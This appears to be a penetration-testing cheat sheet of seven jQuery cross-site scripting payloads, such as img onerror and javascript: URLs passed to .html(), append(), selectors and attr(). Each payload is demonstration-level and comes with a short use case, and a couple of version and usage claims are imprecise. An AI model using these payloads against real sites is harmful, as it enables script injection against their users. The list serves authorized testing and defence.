# jQuery XSS Payloads

Note:
jQuery can introduce XSS vulnerabilities when untrusted input is passed
to DOM manipulation methods like .html(), .append(), or selectors.

# Purpose:
# These payloads demonstrate XSS risks in jQuery when handling
# untrusted input (DOM manipulation, selectors, attributes).

⚠️ Use only in authorized testing environments.

----------------------------------------
1. HTML Injection via .html()
Payload:
$(function(){
  $('#element').html('<img src=x onerror=alert(1)>');
});
Description: Inserts untrusted HTML into DOM.
Use Case: When user input is directly passed to .html().

----------------------------------------
2. Direct Element Injection (jQuery < 3.0.0)
Payload:
$('<img src=x onerror=alert(1)>');
Description: Older jQuery versions parse HTML strings directly.
Use Case: Vulnerable jQuery versions (<3.0.0).

----------------------------------------
3. Selector Injection
Payload:
$(location.hash);
Description: Uses URL fragment as selector.
Use Case: If hash contains malicious input (e.g., #<img...>).

----------------------------------------
4. Attribute Injection
Payload:
$('div').attr('href', 'javascript:alert(1)');
Description: Injects JavaScript into attribute.
Use Case: When user input controls attribute values.

----------------------------------------
5. append() Injection
Payload:
$('#element').append('<img src=x onerror=alert(1)>');
Description: Appends malicious HTML to DOM.
Use Case: Similar to .html(), but adds instead of replaces.

----------------------------------------
6. prepend() Injection
Payload:
$('#element').prepend('<img src=x onerror=alert(1)>');
Description: Inserts malicious HTML at beginning.
Use Case: DOM manipulation with untrusted data.

----------------------------------------
7. before() / after() Injection
Payload:
$('#element').after('<img src=x onerror=alert(1)>');
Description: Injects HTML around elements.
Use Case: Unsafe DOM updates.

----------------------------------------